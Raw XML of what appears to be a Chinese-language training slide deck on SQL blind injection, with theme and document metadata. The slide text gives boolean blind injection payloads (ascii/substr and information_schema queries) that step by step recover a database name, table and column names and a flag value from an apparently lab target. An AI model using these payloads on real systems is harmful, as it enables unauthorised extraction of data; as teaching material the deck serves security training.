          <a:xfrm>
            <a:off x="1318895" y="1951355"/>
            <a:ext cx="357060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猜解当前数据库名称：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229360" y="2319655"/>
            <a:ext cx="974407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and (ascii(substr(database(),1,1)))=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>107</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 返回正常，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>k</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1229360" y="2687955"/>
            <a:ext cx="868489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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and substr(database(),1,1)='k' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 返回正常，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>k</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1437640" y="3056255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猜表名：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144905" y="4003675"/>
            <a:ext cx="1067371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and substr((select table_name from information_schema.tables where table_schema=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kanwolongxia</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> limit 0,1),1,1)='l' 返回正常，说明数据库表名的第一个的第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>l</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1318895" y="4916170"/>
            <a:ext cx="1044511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and substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1)='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>' 返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>loflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228725" y="4714240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猜字段名</a:t>
            </a:r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1318895" y="6196965"/>
            <a:ext cx="1067371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and (ascii(substr(( select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flaglo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>loflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>,1),1,1)))=122返回正常，说明zKaQ列第一位是z</a:t>
            </a:r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1318895" y="5828665"/>
            <a:ext cx="868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猜内容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336040" y="3424555"/>
            <a:ext cx="103378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and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 返回正常，说明当前数据库第一个表长度是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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sx272TGp_report_light">
  <a:themeElements>
    <a:clrScheme name="sx272TGp_report_light 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="003366"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="C0C0C0"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A5A5A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="449CD8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CFCFCF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3D8DC4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="19B3B3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="855ADA"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="sx272TGp_report_light">
      <a:majorFont>
        <a:latin typeface="黑体"/>
        <a:ea typeface="黑体"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="黑体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sx272TGp_report_light 1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4EA7EA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B2D0F3"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="85AE49"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="9999FF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x272TGp_report_light 2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DF6521"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D7D03B"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="ECB8AB"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C3BC35"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="188FB4"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="A98FD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x272TGp_report_light 3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A5A5A5"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="449CD8"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="CFCFCF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="3D8DC4"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="19B3B3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1650</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>113</Paragraphs>
  <Slides>12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Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>方正正粗黑简体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>等待开课</vt:lpstr>
      <vt:lpstr>进阶-使用盲注获得目标数据</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>本章内容</vt:lpstr>
      <vt:lpstr>注入原理-什么是盲注</vt:lpstr>
      <vt:lpstr>注入原理-盲注种类</vt:lpstr>
      <vt:lpstr>盲注函数解析</vt:lpstr>
      <vt:lpstr>盲注演示</vt:lpstr>
      <vt:lpstr>Burpsuite工具的基础使用</vt:lpstr>
      <vt:lpstr>布尔型盲注-burp</vt:lpstr>
      <vt:lpstr>布尔型盲注-burp</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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沈传宁</dc:creator>
  <cp:lastModifiedBy>mss</cp:lastModifiedBy>
  <cp:revision>3085</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-29T13:42:18Z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